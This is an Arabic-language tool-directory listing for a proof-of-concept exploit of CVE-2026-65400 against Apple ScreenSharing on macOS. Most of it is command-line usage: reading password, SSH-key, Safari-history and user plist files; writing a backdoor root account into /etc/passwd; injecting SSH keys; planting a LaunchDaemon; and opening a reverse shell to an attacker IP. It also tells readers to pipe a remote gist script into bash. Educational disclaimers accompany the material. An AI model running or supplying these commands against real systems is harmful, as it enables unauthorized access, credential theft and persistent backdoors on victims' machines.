Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-65400 — استغلال إثبات المفهوم لثغرة CVE-2026-65400 يتيح قراءة/كتابة الملفات بعد المصادقة، وقذائف عكسية، والاستمرارية على نظام macOS عبر Apple ScreenSharing. | Kitploit
أدوات/GitHubGitHub/horkimhab/cve-2026-65400
تصعيد الامتيازاتآليات الاستمراريةالاستغلالما بعد الاستغلالالمصادقةالتعلم والتعليمأداة الوصول عن بعد
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

استغلال إثبات المفهوم لثغرة CVE-2026-65400 يتيح قراءة/كتابة الملفات بعد المصادقة، وقذائف عكسية، والاستمرارية على نظام macOS عبر Apple ScreenSharing.

عرض المستودع
3110منذ 23 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2026-65400

تبرع

ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة أدناه.

paypal

رمز الاستجابة السريعة للتبرع

⚡ الاستخدام البسيط

استخدم هذا المشروع فقط في بيئات آمنة ومصرح بها مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات المختبرات المعزولة
  • بيئات اختبار الاختراق المصرح بها

مثال على الإعداد:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

مثال على الاستخدام:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

ملاحظة:

  • عند الاستنساخ من مشاريع أخرى، يجب عليك تشغيل curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لمسح المجلد .git المتداخل
  • على سبيل المثال: cve-2025-46822.sh، cve-2025-46822-lab.sh، ...

الاعتماد أو المرجع

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 مستودع أبحاث أمن المعلومات التعليمي

مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.


⚠️ إخلاء مسؤولية أمني وقانوني

الغرض

هذا المستودع مخصص لأغراض البحث الأمني التعليمي والمصرح به فقط.

وهو مصمم لمساعدة المستخدمين على التعلم حول:

  • الثغرات الأمنية
  • مفاهيم العزل والبيئة المعزولة
  • ممارسات البرمجة الآمنة والدفاعية

الاستخدام المصرح به فقط

استخدم هذا المستودع فقط في البيئات التي لديك إذن بالدخول إليها، مثل:

  • المختبرات الشخصية أو الأجهزة الافتراضية
  • بيئات Docker أو البيئات المعزولة
  • اختبار الاختراق المصرح به
  • التدريب على الأمن السيبراني أو البحث الأكاديمي

الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.


عدم تحمل المسؤولية

المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناجمة عن هذا المشروع.

باستخدامك لهذا المستودع، فإنك توافق على أن:

  • أنت مسؤول عن أفعالك
  • ستستخدمه بشكل قانوني وأخلاقي
  • يُقدَّم المشروع بدون أي ضمان

الاستخدام الأخلاقي

هذا المشروع مخصص لـ:

  • البحث الأمني الدفاعي
  • التعليم في مجال الأمن السيبراني
  • التوعية بالثغرات
  • البحث في الأنظمة والبرمجيات الآمنة

يرجى اتباع ممارسات الكشف المسؤول والامتثال لجميع القوانين المعمول بها.


التواصل

للكشف المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.


المشاريع ذات الصلة

استكشف مجموعة PoC لثغرات CVE للحصول على موارد إضافية للبراهين المفاهيمية لثغرات CVE مخصصة للبحث الأمني المصرح به والتعليم.

تنزيل الأداة